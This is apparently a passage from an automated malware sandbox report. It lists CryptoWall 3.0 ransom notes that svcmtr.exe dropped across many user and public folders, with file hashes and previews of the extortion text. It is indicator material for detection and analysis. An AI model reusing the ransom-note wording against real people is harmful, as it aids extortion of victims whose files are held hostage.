                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\Saved Games\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\Saved Games\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\Searches\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\Searches\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Desktop\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Desktop\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Documents\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Documents\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Favorites\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Favorites\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Music\Sample Music\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Music\Sample Music\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Music\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Music\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
